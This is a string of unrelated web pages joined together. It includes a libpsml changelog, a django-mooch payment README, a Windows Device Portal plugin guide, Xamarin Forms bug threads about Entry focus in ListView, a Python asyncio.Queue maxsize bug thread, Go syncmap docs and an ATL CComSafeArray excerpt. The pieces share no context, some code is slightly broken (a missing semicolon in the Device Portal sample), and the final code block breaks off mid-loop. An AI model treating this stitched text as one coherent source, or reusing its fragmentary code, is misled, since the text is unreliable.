- 108. By Alberto Garcia on 2017-07-19
Release of libpsml-1.1.4
* Update the release_notes
* Remove fossil file
* Update README
We follow the patch convention encoded in src/m_psml_core.f90, which is also followed by the ps_GetLibPSMLVersion function, so the first 1.1 release is 1.1.4.
- 107. By Alberto Garcia on 2017-07-18
Update draft preprint and CHANGES file
- 106. By Alberto Garcia on 2017-07-18
Work around missing documentation for aliased types
Added a section in the developer notes to explain the origin of ps_annotation_t and ps_radfunc_t. Updated front matter in top-level libpsml.md
- 105. By Alberto Garcia on 2017-07-18
Add the missing documentation
Wrote an overview of the functionality, with links to FORD-generated interfaces. Note that the interfaces in the code itself are lightly commented, originally in a Doxygen interface roughly compatible with FORD. This will be done progressively in future revisions of libpsml beyond the release.
- 104. By Alberto Garcia on 2017-07-17
Remove old example files. Use ESL namespace in normalizer
* Removed fossil files in 'examples'.
* Renamed 'examples/test_dump' to 'normalize'. In this file, use the namespace URI http://esl.cecam.org/PSML/ns/1.1
- 103. By Alberto Garcia on 2017-07-17
Support record-number attribute in <provenance>
* The parser will add the appropriate entry in the data structures, and the dump routine will generate <provenance> elements with the 'record-number' attribute. Wrongly ordered elements in the file will trigger an error.
* Update schema and API documentation in paper.
- 102. By Alberto Garcia on 2017-07-17
Treatment of tails in interpolation
* Tail regions might exhibit ringing with the high-order extrapolator. Upon parsing, the location of the last "zero" point (scanning backwards from the end) is encoded in the radfunc_t structure, and used as the effective cutoff point. Only in cases where the first "non-zero" is very small and sits at an "elbow" in the data will there be a bit of ringing, but it will be confined to the last interval.
* The new behavior is configurable with a new routine ps_SetEvaluatorOptions which consolidates the setting of debugging, interpolator quality, and use of effective range. If procedure pointers are supported by the compiler, the interpolator itself can be set by this routine.
* Added an option '-t' to examples/show_psml to turn off the end-of-range processing. In this case the full range in the PSML file data will be used for interpolation. This program also generates "raw" tabular data when in "plot" mode.
- 101. By Alberto Garcia on 2017-07-13
Add 'eref' attribute to slps. Provenance and char length fixes
* Added support for the 'eref' attribute in semilocal potentials.
* Provenance data for child elements was inserted in the wrong place in the pseudo-atom-spec hierarchy.
* Increased the length of the character variables in the ps_t type to avoid setting a non-zero status flag in xmlf90's 'get_value' for long attributes.
* examples/test_dump now inserts a new provenance element when dumping a ps_t object read from a PSML 1.0 file.
* If the pre-processor symbol PSML_NO_OLD_API is defined, only the new API routines will be compiled in.
* Updated examples/{show_psml, getz} to use only the new API, and inserted pre-processor instructions to avoid compiling examples/test_psml if the old API compatibility layer is not compiled in. Remove outdated programs v10tov11 and dumper.
* Updated the schema and the description paper.
- 100. By Alberto Garcia on 2017-07-07
Add optional energy_level attribute in the <pswf> element
Branch metadata
- Branch format: Branch format 7
- Repository format: Bazaar repository format 2a (needs bzr 1.16 or later)
https://code.launchpad.net/~albertog/libpsml/trunk
CC-MAIN-2017-39
en
refinedweb
Simple payment for Django
Install django-mooch using pip and add mooch to your INSTALLED_APPS.
Add a moochers app:

from collections import OrderedDict

from django.conf import settings
from django.conf.urls import include, url

from mooch.banktransfer import BankTransferMoocher
from mooch.postfinance import PostFinanceMoocher
from mooch.stripe import StripeMoocher

from myapp.models import Thing  # Inherit mooch.models.Payment

app_name = 'mooch'  # This is the app namespace.

moochers = OrderedDict((
    ('postfinance', PostFinanceMoocher(
        model=Thing,
        pspid='thing',
        live=False,
        sha1_in=settings.POSTFINANCE_SHA1_IN,
        sha1_out=settings.POSTFINANCE_SHA1_OUT,
        app_name=app_name,
    )),
    ('stripe', StripeMoocher(
        model=Thing,
        publishable_key=settings.STRIPE_PUBLISHABLE_KEY,
        secret_key=settings.STRIPE_SECRET_KEY,
        app_name=app_name,
    )),
    ('banktransfer', BankTransferMoocher(
        model=Thing,
        autocharge=True,  # Mark all payments as successful.
        app_name=app_name,
    )),
))

urlpatterns = [
    url(r'', moocher.urls) for moocher in moochers.values()
]

Include the moochers app / URLconf somewhere in your other URLconfs.
Add a payment page:

def pay(request, id):
    instance = get_object_or_404(Thing.objects.all(), id=id)
    return render(request, 'pay.html', {
        'thing': instance,
        'moochers': [
            moocher.payment_form(request, instance)
            for moocher in moochers.values()
        ],
    })

Maybe send a confirmation mail when charges happen (an example template for this is actually included with the project). Please note that contrary to most other projects, django-mooch uses the moocher instance as sender, not the class:

from mooch.mail import render_to_mail
from mooch.signals import post_charge

# The signal handler receives the moocher instance, the payment and
# the request.
def send_mail(sender, payment, request, **kwargs):
    render_to_mail('mooch/thanks_mail', {
        'payment': payment,
    }, to=[payment.email]).send(fail_silently=True)

# Connect the signal to our moocher instances (moochers may be used
# more than once on the same website):
for moocher in moochers.values():
    post_charge.connect(send_mail, sender=moocher)

If you want to differentiate between moochers (for example to send a different mail for bank transfers, because the payment has not actually happened yet) set the sender argument when connecting as follows:

# Some stuff you'll have to imagine... sorry.
post_charge.connect(thank_you_mail, moochers['postfinance'])
post_charge.connect(thank_you_mail, moochers['stripe'])
post_charge.connect(please_pay_mail, moochers['banktransfer'])
https://pypi.org/project/django-mooch/
CC-MAIN-2017-39
en
refinedweb
=== Error in new template for Forms Content Page Xaml file. Codebehind is creating an instance of class ContentPageViewModel that doesn't exist. === Steps to replicate === 1. Create a new Forms project. 2. Right-click project and add Forms Content Page Xaml file. === Expected result === Sample should create instance of class named after the file created. public fcp() { InitializeComponent(); BindingContext = new [NameOfContentPage]ViewModel(); } === Actual result === Sample creates instance of ContentPageViewModel resulting in red squigglies and the error: "The type of namespace name 'ContentPageViewModel' could not be found (are you missing a using directive or an assembly reference?)" public fcp() { InitializeComponent(); BindingContext = new ContentPageViewModel(); } Incorrect template Ignore last message - too many Bugzilla tabs open :( *** Bug 53104 has been marked as a duplicate of this bug. *** Good luck with the quick fix, cool click counter template. Just watching the Xamarin Show 17: ReactiveUI, James looks A LITTLE TIRED hahaha Created attachment 21549 [details] Attached Logs Bug is retested and verified in the below test environment: • Microsoft Visual Studio Enterprise 2017 d15rel Version 15.1 (26403.0) d15rel d15rel • Microsoft .NET Framework Version 4.6.01586 • Xamarin 4.5.0.339 (265d40a) • Xamarin.Android SDK 7.3.0.5 (40f69c3) • Xamarin.iOS and Xamarin.Mac SDK 10.10.0.4 (9245c1c) Actual Result- There is no red squiggles in added Content Page.cs file.Hence marking bug as verified. Please refer the attached gist and screencast link for bug verification reference Gist Link- Screen Cast Link- Still not fixed. I get it after doing this: 1. In Portable project Add new item... 2. Choose "Forms Content Page Xaml" 3. Click "Add" 4. Open .cs-file and "BindingContext = new ContentPageViewModel();" is still there. Hi, This will be fixed in the next stable release of Visual Studio. Thanks so much for the report. :) Pierce Boggan
https://xamarin.github.io/bugzilla-archives/52/52985/bug.html
CC-MAIN-2019-43
en
refinedweb
Write a custom plugin for Device Portal Learn how to write a UWP app that uses th Windows Device Portal to host a web page and provide diagnostic information. Starting with the Creators Update, you can use Device Portal to host your app's diagnostic interfaces. This article covers the three pieces needed to create a DevicePortalProvider for your app – the appxmanifest changes, setting up your app’s connection to the Device Portal service, and handling an incoming request. A sample app is also provided to get started (Coming soon) . Create a new UWP app project In this guide, we'll create everything in one solution for simplicity. In Microsoft Visual Studio 2019, create a new UWP app project. Go to File > New > Project and select Blank App (Windows Universal) for C#, and then click Next. In the Configure your new project dialog box. Name the project "DevicePortalProvider" and then click Create. This will be the app that contains the app service. Ensure that you choose "Windows 10 Creators Update (10.0; Build 15063)" to support. You may need to update Visual Studio or install the new SDK - see here for details. Add the devicePortalProvider extension to your package.appxmanifest file You will need to add some code to your package.appxmanifest file in order to make your app functional as a Device Portal plugin. First, add the following namespace definitions at the top of the file. Also add them to the IgnorableNamespaces attribute. <Package ... xmlns: ... In order to declare that your app is a Device Portal Provider, you need to create an app service and a new Device Portal Provider extension that uses it. Add both the windows.appService extension and the windows.devicePortalProvider extension in the Extensions element under Application. Make sure the AppServiceName attributes match in each extension. This indicates to the Device Portal service that this app service can be launched to handle requests on the handler namespace. ... <Application Id="App" Executable="$targetnametoken$.exe" EntryPoint="DevicePortalProvider.App"> ... <Extensions> <uap:Extension <uap:AppService </uap:Extension> <uap4:Extension <uap4:DevicePortalProvider </uap4:Extension> </Extensions> </Application> ... The HandlerRoute attribute references the REST namespace claimed by your app. Any HTTP requests on that namespace (implicitly followed by a wildcard) received by the Device Portal service will be sent to your app to be handled. In this case, any successfully authenticated HTTP request to <ip_address>/MyNamespace/api/* will be sent to your app. Conflicts between handler routes are settled via a "longest wins" check: whichever route matches more of the requests is selected, meaning that a request to "/MyNamespace/api/foo" will match against a provider with "/MyNamespace/api" rather than one with "/MyNamespace". Two new capabilities are required for this functionality. they must also be added to your package.appxmanifest file. ... <Capabilities> ... <Capability Name="privateNetworkClientServer" /> <rescap:Capability </Capabilities> ... Note The capability "devicePortalProvider" is restricted ("rescap"), which means you must get prior approval from the Store before your app can be published there. However, this does not prevent you from testing your app locally through sideloading. For more information about restricted capabilities, see App capability declarations. 
Set up your background task and WinRT Component In order to set up the Device Portal connection, your app must hook up an app service connection from the Device Portal service with the instance of Device Portal running within your app. To do this, add a new WinRT Component to your application with a class that implements IBackgroundTask. namespace MySampleProvider { // Implementing a DevicePortalConnection in a background task public sealed class SampleProvider : IBackgroundTask { //... } Make sure that its name matches the namespace and class name set up by the AppService EntryPoint ("MySampleProvider.SampleProvider"). When you make your first request to your Device Portal provider, Device Portal will stash the request, launch your app's background task, call its Run method, and pass in an IBackgroundTaskInstance. Your app then uses it to set up a DevicePortalConnection instance. // Implement background task handler with a DevicePortalConnection public void Run(IBackgroundTaskInstance taskInstance) { // Take a deferral to allow the background task to continue executing this.taskDeferral = taskInstance.GetDeferral(); taskInstance.Canceled += TaskInstance_Canceled; // Create a DevicePortal client from an AppServiceConnection var details = taskInstance.TriggerDetails as AppServiceTriggerDetails; var appServiceConnection = details.AppServiceConnection; this.devicePortalConnection = DevicePortalConnection.GetForAppServiceConnection(appServiceConnection); // Add Closed, RequestReceived handlers devicePortalConnection.Closed += DevicePortalConnection_Closed; devicePortalConnection.RequestReceived += DevicePortalConnection_RequestReceived; } There are two events that must be handled by the app to complete the request handling loop: Closed, for whenever the Device Portal service shuts down, and RequestReceived, which surfaces incoming HTTP requests and provides the main functionality of the Device Portal provider. Handle the RequestReceived event The RequestReceived event will be raised once for every HTTP request that is made on your plugin's specified Handler Route. The request handling loop for Device Portal providers is similar to that in NodeJS Express: the request and response objects are provided together with the event, and the handler responds by filling in the response object. In Device Portal providers, the RequestReceived event and its handlers use Windows.Web.Http.HttpRequestMessage and HttpResponseMessage objects. // Sample RequestReceived echo handler: respond with an HTML page including the query and some additional process information. private void DevicePortalConnection_RequestReceived(DevicePortalConnection sender, DevicePortalConnectionRequestReceivedEventArgs args) { var req = args.RequestMessage; var res = args.ResponseMessage; if (req.RequestUri.AbsolutePath.EndsWith("/echo")) { // construct an html response message string con = "<h1>" + req.RequestUri.AbsoluteUri + "</h1><br/>"; var proc = Windows.System.Diagnostics.ProcessDiagnosticInfo.GetForCurrentProcess(); con += String.Format("This process is consuming {0} bytes (Working Set)<br/>", proc.MemoryUsage.GetReport().WorkingSetSizeInBytes); con += String.Format("The process PID is {0}<br/>", proc.ProcessId); con += String.Format("The executable filename is {0}", proc.ExecutableFileName); res.Content = new HttpStringContent(con); res.Content.Headers.ContentType = new HttpMediaTypeHeaderValue("text/html"); res.StatusCode = HttpStatusCode.Ok; } //... 
} In this sample request handler, we first pull the request and response objects out of the args parameter, then create a string with the request URL and some additional HTML formatting. This is added into the Response object as an HttpStringContent instance. Other IHttpContent classes, such as those for "String" and "Buffer," are also allowed. The response is then set as an HTTP response and given a 200 (OK) status code. It should render as expected in the browser that made the original call. Note that when the RequestReceived event handler returns, the response message is automatically returned to the user agent: no additional "send" method is needed. Providing static content Static content can be served directly from a folder within your package, making it very easy to add a UI to your provider. The easiest way to serve static content is to create a content folder in your project that can map to a URL. Then, add a route handler in your RequestReceived event handler that detects static content routes and maps a request appropriately. if (req.RequestUri.LocalPath.ToLower().Contains("/www/")) { var filePath = req.RequestUri.AbsolutePath.Replace('/', '\\').ToLower(); filePath = filePath.Replace("\\backgroundprovider", "") try { var fileStream = Windows.ApplicationModel.Package.Current.InstalledLocation.OpenStreamForReadAsync(filePath).GetAwaiter().GetResult(); res.StatusCode = HttpStatusCode.Ok; res.Content = new HttpStreamContent(fileStream.AsInputStream()); res.Content.Headers.ContentType = new HttpMediaTypeHeaderValue("text/html"); } catch(FileNotFoundException e) { string con = String.Format("<h1>{0} - not found</h1>\r\n", filePath); con += "Exception: " + e.ToString(); res.Content = new HttpStringContent(con); res.StatusCode = HttpStatusCode.NotFound; res.Content.Headers.ContentType = new HttpMediaTypeHeaderValue("text/html"); } } Make sure that all files inside of the content folder are marked as "Content" and set to "Copy if newer" or "Copy always" in Visual Studio’s Properties menu. This ensures that the files will be inside your AppX Package when you deploy it. Using existing Device Portal resources and APIs Static content served by a Device Portal provider is served on the same port as the core Device Portal service. This means that you can reference the existing JS and CSS included with Device Portal with simple <link> and <script> tags in your HTML. In general, we suggest the use of rest.js, which wraps all the core Device Portal REST APIs in a convenient webbRest object, and the common.css file, which will allow you to style your content to fit with the rest of Device Portal's UI. You can see an example of this in the index.html page included in the sample. It uses rest.js to retrieve the device name and running processes from Device Portal. Importantly, use of the HttpPost/DeleteExpect200 methods on webbRest will automatically do the CSRF handling for you, which allows your webpage to call state-changing REST APIs. Note The static content included with Device Portal does not come with a guarantee against breaking changes. While the APIs are not expected to change often, they may, especially in the common.js and controls.js files, which your provider should not use. Debugging the Device Portal connection In order to debug your background task, you must change the way Visual Studio runs your code. 
Follow the steps below for debugging an app service connection to inspect how your provider is handling the HTTP requests: - From the Debug menu, select DevicePortalProvider Properties. - Under the Debugging tab, in the Start action section, select “Do not launch, but debug my code when it starts”. - Set a breakpoint in your RequestReceived handler function. Note Make sure the build architecture matches the architecture of the target exactly. If you are using a 64-bit PC, you must deploy using an AMD64 build. 4. Press F5 to deploy your app 5. Turn Device Portal off, then turn it back on so that it finds your app (only needed when you change your app manifest – the rest of the time you can simply re-deploy and skip this step). 6. In your browser, access the provider's namespace, and the breakpoint should be hit. Related topics Feedback
https://docs.microsoft.com/en-us/windows/uwp/debug-test-perf/device-portal-plugin
CC-MAIN-2019-43
en
refinedweb
Created on 2014-06-11 15:59 by vajrasky, last changed 2014-06-17 22:44 by emptysquare. This issue is now closed.

import asyncio
loop = asyncio.get_event_loop()
q = asyncio.Queue(maxsize=1.2, loop=loop)
q.put_nowait(1)
q.put_nowait(1)
q.put_nowait(1)
q.put_nowait(1)
q.put_nowait(1)
.... and so on

It seems counterintuitive to my innocent eyes. As a comparison with the traditional queue:

import queue
q = queue.Queue(maxsize=1.2)
q.put(1)
q.put(1)
q.put(1) -> blocking

Here is the patch to make the behaviour consistent with its sibling.
It looks strange to use a float as maxsize. I suggest to raise a TypeError in the constructor if the type is not int, or maybe to cast maxsize parameter to an int.
FWIW, this can also be resolved by fixing Queue.full to do "self.qsize() >= self._maxsize" instead of "self.qsize() == self._maxsize". I generally don't like implicit casts as they break duck typing.
"It looks strange to use a float as maxsize." => It is. But the float could be coming programmatically. A float value interpreted as infinity could give a shock to some people.
"maybe to cast maxsize parameter to an int." => ceiling or flooring?
The patch looks fine to me.
New changeset ccfc13183fea by Victor Stinner in branch '3.4': Issue #21723: asyncio.Queue: support any type of number (ex: float) for the
New changeset a2f115bfa513 by Victor Stinner in branch 'default': (Merge 3.4) Issue #21723: asyncio.Queue: support any type of number (ex: float)
Thanks Vajrasky, I applied your patch. Change also pushed to Tulip (changeset 3a392e5328c0).
https://bugs.python.org/issue21723
CC-MAIN-2019-43
en
refinedweb
Hi, I've pasted a sample app below but I essentially have a set of Entries within a ListView, using a class inherited from ViewCell. The error I'm getting is when tapping the Entry. Expected behaviour: Entry comes into focus and keyboard appears Actual Behaviour: Entry flashes, cursor appears briefly and then disappears again. No keyboard activity. public class App { public static Page GetMainPage() { return new NavigationPage(new TestPage()); } } public class TestPage : ContentPage { public TestPage() { var holder = new StackLayout { Orientation = StackOrientation.Vertical, HorizontalOptions = LayoutOptions.FillAndExpand, VerticalOptions = LayoutOptions.Center, Padding = new Thickness(10, 0, 10, 20), }; var listview = new ListView { RowHeight = 150, VerticalOptions = LayoutOptions.Center, ItemsSource = new List<string>{"",""}, ItemTemplate = new DataTemplate(typeof(TestFieldCell)), }; holder.Children.Add(listview); this.Content = holder; } } public class TestFieldCell:ViewCell { protected override void OnBindingContextChanged() { base.OnBindingContextChanged(); View = new Entry(); } } This example app will work fine in forms version 1.2.3.6257, but fails in 1.3.1.6296. Is there something that I'm missing or is this a bug? Thanks in advance, Paul. I afraid I haven't. I've raised a bug for it(), but in the meantime i've had to rollback Xamarin.Forms. Paul. Answers I'm having the same issue. Did you solve your problem? I afraid I haven't. I've raised a bug for it(), but in the meantime i've had to rollback Xamarin.Forms. Paul. Similar problem here. Could not solve it. In my case it does not show anything when trying to tap into the Entry. It looks like it is disabled. Even the workarounds suggested in the guides () and setting WindowSoftInputMode = SoftInput.AdjustPan to the MainActivitiy (like suggested in the knowledge base) did not work. On iOS this works as expected. Our customer wants this to be solved. And I hope I do not have to rollback Xamarin.Forms... Having a similar issue with Entry(s) in a ListView. Any updates on a fix or workaround? It has been fixed. Update to 1.3.5 it will work. not at all. I've reopened a bug with viewcell / grid / entry Hmmmm... I dunno, double checked, definitely working for me. entry/viewcell/listview. My issue has gone away with 1.3.5 ...
https://forums.xamarin.com/discussion/30888/cant-edit-entry-within-listview-forms-1-3-1-error
CC-MAIN-2019-43
en
refinedweb
import "golang.org/x/sync/syncmap" Package syncmap provides a concurrent map implementation. This was the prototype for sync.Map which was added to the standard library's sync package in Go 1.9.. Map is a concurrent map with amortized-constant-time loads, stores, and deletes. It is safe for multiple goroutines to call a Map's methods concurrently. The zero Map is valid and empty. A Map must not be copied after first use. Package syncmap imports 1 packages (graph) and is imported by 178 packages. Updated 2019-10-09. Refresh now. Tools for package owners.
https://godoc.org/golang.org/x/sync/syncmap
CC-MAIN-2019-43
en
refinedweb
IDL provides several attributes for specifying arrays in COM interfaces. Attributes such as [size_is] and [length_is] enable you to adorn method definitions with information required to marshal these arrays across COM boundaries. Yet not all languages support arrays in the same way. For instance, some languages support zero-based arrays, while others require one-based arrays. Still others, such as Visual Basic, allow the application itself to decide whether the arrays it references are zero-based or one-based. Array storage varies from language to language as well: Some languages store elements in row-major order, and others use column-major order. To make the situation even worse, type libraries don't support the IDL attributes needed to marshal C-style IDL arrays; the MIDL compiler silently drops these attributes when generating type libraries. To address the challenges of passing arrays between COM clients in a language-agnostic manner, Automation defines the SAFEARRAY data type. In much the same way as VARIANTs are self-describing generic data types, SAFEARRAYs are self-describing generic arrays. SAFEARRAYs are declared in IDL as follows: interface IMyInterface : IUnknown { HRESULT GetArray([out,retval] SAFEARRAY(VARIANT_BOOL)* myArray); }; The VARIANT_BOOL parameter to the SAFEARRAY declaration indicates the data type of the elements in the SAFEARRAY. This type must be an Automation-compatible type as well, meaning that it must be one of the data types that can be contained in a VARIANT. The MIDL compiler preserves this information in the type library so that clients can discover the underlying type of the SAFEARRAY. The C++ binding for the SAFEARRAY type is actually a struct that represents a self-describing array. It contains a description of the contents of the array, including the upper and lower bounds and the total number of elements in the array. The SAFEARRAY struct is defined in oaidl.h as follows: typedef struct tagSAFEARRAY { USHORT cDims; USHORT fFeatures; ULONG cbElements; ULONG cLocks; PVOID pvData; SAFEARRAYBOUND rgsabound[ 1 ]; } SAFEARRAY; The upper and lower bounds for the SAFEARRAY are stored in the rgsabound array. Each element in this array is a SAFEARRAYBOUND structure. typedef struct tagSAFEARRAYBOUND { ULONG cElements; LONG lLbound; } SAFEARRAYBOUND; The leftmost dimension of the array is contained in rgsabound[0], and the rightmost dimension is in rgsabound[cDims - 1]. For example, an array declared with C-style syntax to have dimensions of [3][4] would have two elements in the rgsabound array. The first element at offset zero would have a cElements value of 3 and an lLbound value of 0; the second element at offset one would have a cElements value of 4 and also an lLbound value of 0. The pvData field of the SAFEARRAY struct points to the actual data in the array. The cbElements array indicates the size of each element. As you can see, this data type is flexible enough to represent an array with an arbitrary number of elements and dimensions. COM provides a number of APIs for managing SAFEARRAYs. These functions enable you to create, access, and destroy SAFEARRAYs of various dimensions and sizes. The following code demonstrates how to use these functions to manipulate two-dimensional SAFEARRAYs of double. 
The first step is to create an array of SAFEARRAYBOUND structures to indicate the number and size of the array dimensions:

SAFEARRAYBOUND rgsabound[2];
rgsabound[0].cElements = 3;
rgsabound[0].lLbound = 0;
rgsabound[1].cElements = 4;
rgsabound[1].lLbound = 0;

This code specifies a two-dimensional array with three elements in the first dimension (three rows) and four elements in the second dimension (four columns). This array is then passed to the SafeArrayCreate function to allocate the appropriate amount of storage:

SAFEARRAY* psa = ::SafeArrayCreate(VT_R8, 2, rgsabound);

The first parameter to this function indicates the data type for the elements of the array. The second parameter specifies the number of elements in the rgsabound array (that is, the number of dimensions). The final parameter is the array of SAFEARRAYBOUND structures describing each dimension of the SAFEARRAY. You can retrieve elements of the SAFEARRAY using the SafeArrayGetElement function, like this:

long rgIndices[] = { 2, 1 };
double lElem;
::SafeArrayGetElement(psa, rgIndices, (void*)&lElem);

This code retrieves the element stored at location [1][2], that is, the second row, third column. Confusingly, rgIndices specifies the SAFEARRAY indices in reverse order: The first element of the rgIndices array specifies the rightmost dimension of the SAFEARRAY. You must manually free the SAFEARRAY and the data it contains using the SafeArrayDestroy function.

::SafeArrayDestroy(psa);

As you can see, manipulating SAFEARRAYs with these APIs is a bit tedious. Fortunately, ATL provides some relief in the form of a templatized wrapper class called CComSafeArray. This class is defined in atlsafe.h as follows:

template <typename T, VARTYPE _vartype = _ATL_AutomationType<T>::type>
class CComSafeArray {
...
public:
    LPSAFEARRAY m_psa;
}

This template class encapsulates a pointer to a SAFEARRAY as its only state. The first template parameter is the C++ type that will be stored in the internal SAFEARRAY. Recall that SAFEARRAYs can hold only Automation-compatible types as elements, that is, data types that can be stored in a VARIANT. So, the second template parameter to CComSafeArray indicates the VARTYPE of the elements to be stored. Only a subset of the VARIANT-compatible types are supported with CComSafeArray. These are listed in Table 3.1.

Table 3.1. VARTYPE / C++ Type
VT_I1        char
VT_I2        short
VT_I4        int, long
VT_I8        longlong
VT_UI1       byte
VT_UI2       ushort
VT_UI4       uint, ulong
VT_UI8       ulonglong
VT_R4        float
VT_R8        double
VT_DECIMAL   decimal
VT_VARIANT   variant
VT_CY        currency
VT_BSTR      BSTR
VT_DISPATCH  IDispatch pointer
VT_UNKNOWN   IUnknown pointer

The documentation indicates that the last three VARTYPEs (BSTR, IDispatch, and IUnknown pointers) are not supported. The documentation is wrong; CComSafeArray uses template specialization to accommodate the unique semantics of these data types. The default value for the second template parameter employs a clever combination of templates and macros to automatically associate the C++ data type with the VARTYPE that the SAFEARRAY API functions must use internally. The default parameter value uses the _ATL_AutomationType dummy template, defined as follows:

template <typename T>
struct _ATL_AutomationType {
};

The DEFINE_AUTOMATION_TYPE_FUNCTION macro generates type mappings from the C++ data type to the appropriate VARTYPE. The type enum member holds the VARTYPE that CComSafeArray ultimately will use:

#define DEFINE_AUTOMATION_TYPE_FUNCTION(ctype, typewrapper, oleautomationtype) \
    template <> \
    struct _ATL_AutomationType<ctype> { \
        typedef typewrapper _typewrapper;\
        enum { type = oleautomationtype }; \
        static void* GetT(const T& t) { \
            return (void*)&t; \
        } \
    };

A series of these macros are declared in atlsafe.h to map CComSafeArray-supported types to the appropriate VARTYPE. Note that these macros include as the second macro parameter a typewrapper. This is interesting only for the four supported data types that require special handling: VARIANT, BSTR, IDispatch*, and IUnknown*.

DEFINE_AUTOMATION_TYPE_FUNCTION(CHAR, CHAR, VT_I1)
DEFINE_AUTOMATION_TYPE_FUNCTION(SHORT, SHORT, VT_I2)
DEFINE_AUTOMATION_TYPE_FUNCTION(INT, INT, VT_I4)
DEFINE_AUTOMATION_TYPE_FUNCTION(LONG, LONG, VT_I4)
DEFINE_AUTOMATION_TYPE_FUNCTION(LONGLONG, LONGLONG, VT_I8)
DEFINE_AUTOMATION_TYPE_FUNCTION(BYTE, BYTE, VT_UI1)
DEFINE_AUTOMATION_TYPE_FUNCTION(USHORT, USHORT, VT_UI2)
DEFINE_AUTOMATION_TYPE_FUNCTION(UINT, UINT, VT_UI4)
DEFINE_AUTOMATION_TYPE_FUNCTION(ULONG, ULONG, VT_UI4)
DEFINE_AUTOMATION_TYPE_FUNCTION(ULONGLONG, ULONGLONG, VT_UI8)
DEFINE_AUTOMATION_TYPE_FUNCTION(FLOAT, FLOAT, VT_R4)
DEFINE_AUTOMATION_TYPE_FUNCTION(DOUBLE, DOUBLE, VT_R8)
DEFINE_AUTOMATION_TYPE_FUNCTION(DECIMAL, DECIMAL, VT_DECIMAL)
DEFINE_AUTOMATION_TYPE_FUNCTION(VARIANT, CComVariant, VT_VARIANT)
DEFINE_AUTOMATION_TYPE_FUNCTION(CY, CY, VT_CY)

With these definitions in hand, declaring an instance of CComSafeArray<long> would generate a second parameter of _ATL_AutomationType<long>::type, where the exposed type member is equal to VT_I4. The template parameter you pass to CComSafeArray establishes only the data type of the SAFEARRAY elements, not the number of dimensions or the size of each dimension. This information is established through one of the seven CComSafeArray constructors. The first constructor is the default (parameterless) constructor and simply initializes m_psa to NULL. Three other constructors create a new CComSafeArray instance from dimension and size information. The first of these constructors creates a one-dimensional array with ulCount elements and is indexed starting with lLBound:

explicit CComSafeArray(ULONG ulCount, LONG lLBound = 0);

Internally, this constructor uses these arguments to create an instance of a class that serves as a thin wrapper for the SAFEARRAYBOUND structure discussed earlier. The CComSafeArrayBound class exposes simple methods for manipulating the number of elements in a particular CComSafeArray dimension, as well as the starting index (lower bound) for that dimension. Note that this class derives directly from the SAFEARRAYBOUND structure, so it can be passed to methods that expect either a CComSafeArrayBound class or a SAFEARRAYBOUND structure.

class CComSafeArrayBound : public SAFEARRAYBOUND {
    CComSafeArrayBound(ULONG ulCount = 0, LONG lLowerBound = 0) { ... }
    CComSafeArrayBound& operator=(const CComSafeArrayBound& bound) { ... }
    CComSafeArrayBound& operator=(ULONG ulCount) { ... }
    ULONG GetCount() const { ... }
    ULONG SetCount(ULONG ulCount) { ... }
    LONG GetLowerBound() const { ... }
    LONG SetLowerBound(LONG lLowerBound) { ... }
    LONG GetUpperBound() const { ... }
};

A quick look at the implementation for the CComSafeArray(ULONG, LONG) constructor demonstrates how all the nondefault constructors use the CComSafeArrayBound wrapper class:

explicit CComSafeArray(ULONG ulCount, LONG lLBound = 0) : m_psa(NULL) {
    CComSafeArrayBound bound(ulCount, lLBound);
    HRESULT hRes = Create(&bound);
    if (FAILED(hRes))
        AtlThrow(hRes);
}

An instance of CComSafeArrayBound is created and passed to the Create member function, which is itself a thin wrapper over the SAFEARRAY API functions. As shown in the following code fragment, Create uses the SafeArrayCreate API to support building a SAFEARRAY with any number of dimensions:

HRESULT Create(const SAFEARRAYBOUND *pBound, UINT uDims = 1) {
    ATLASSERT(m_psa == NULL);
    ATLASSERT(uDims > 0);
    HRESULT hRes = S_OK;
    m_psa = SafeArrayCreate(_vartype, uDims, const_cast<LPSAFEARRAYBOUND>(pBound));
    if (NULL == m_psa)
        hRes = E_OUTOFMEMORY;
    else
        hRes = Lock();
    return hRes;
}

This first constructor just shown is probably the most frequently used. One-dimensional SAFEARRAYs are much more common than multidimensional SAFEARRAYs, and C++ developers are accustomed to zero-based array indexing. You make use of this simple constructor with code such as the following:

// create a 1-D zero-based SAFEARRAY of long with 10 elements
CComSafeArray<long> sa(10);
// create a 1-D one-based SAFEARRAY of double with 5 elements
CComSafeArray<double> sa(5,1);

The second CComSafeArray constructor enables you to pass in a SAFEARRAYBOUND structure or a CComSafeArrayBound instance:

explicit CComSafeArray(const SAFEARRAYBOUND& bound);

This constructor is invoked when you write code similar to the following:

CComSafeArrayBound bound(5,1); // 1-D one-based array
CComSafeArray<long> sa(bound);

This constructor is arguably less useful and less succinct than passing the bounds information directly via the first constructor shown. You use the third constructor to create a multidimensional SAFEARRAY. This constructor accepts an array of SAFEARRAYBOUND structures or CComSafeArrayBound instances, along with a UINT parameter to indicate the number of dimensions:

explicit CComSafeArray(const SAFEARRAYBOUND *pBound, UINT uDims = 1);

You create a multidimensional CComSafeArray with this constructor as follows:

// 3-D array with all dimensions
// left-most dimension has 3 elements
CComSafeArrayBound bound1(3);
// middle dimension has 4 elements
CComSafeArrayBound bound2(4);
// right-most dimension has 5 elements
CComSafeArrayBound bound3(5);
// equivalent C-style array indices would be [3][4][5]
CComSafeArrayBound rgBounds[] = { bound1, bound2, bound3 };
CComSafeArray<int> sa(rgBounds, 3);

Note that nothing prevents you from creating different starting indices for the different dimensions of the SAFEARRAY, nothing but your conscience, that is. This would be extraordinarily confusing for any code that uses this type. In any event, as mentioned previously, multidimensional SAFEARRAYs are pretty rare creatures in reality, so we won't belabor the point. The remaining three CComSafeArray constructors create an instance from an existing SAFEARRAY or CComSafeArray. They are declared as follows:

CComSafeArray(const SAFEARRAY *psaSrc) : m_psa(NULL);
CComSafeArray(const SAFEARRAY& saSrc) : m_psa(NULL);
CComSafeArray(const CComSafeArray& saSrc) : m_psa(NULL);

All three constructors do the same thing: check for a NULL source and delegate to the CopyFrom method to duplicate the contents of the source instance.
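Before looking at CopyFrom itself, here is a minimal sketch, not taken from the original text, of how the one-dimensional constructor works together with the bounds queries and the GetAt/SetAt accessors that are covered later in this section. The function name FillAndSum and the element values are purely illustrative:

#include <atlsafe.h>

void FillAndSum()
{
    CComSafeArray<long> sa(5, 1);            // 5 elements, lower bound 1

    // SetAt and GetAt work in terms of the declared bounds
    for (LONG i = sa.GetLowerBound(); i <= sa.GetUpperBound(); i++)
        sa.SetAt(i, i * 10);

    long total = 0;
    for (LONG i = sa.GetLowerBound(); i <= sa.GetUpperBound(); i++)
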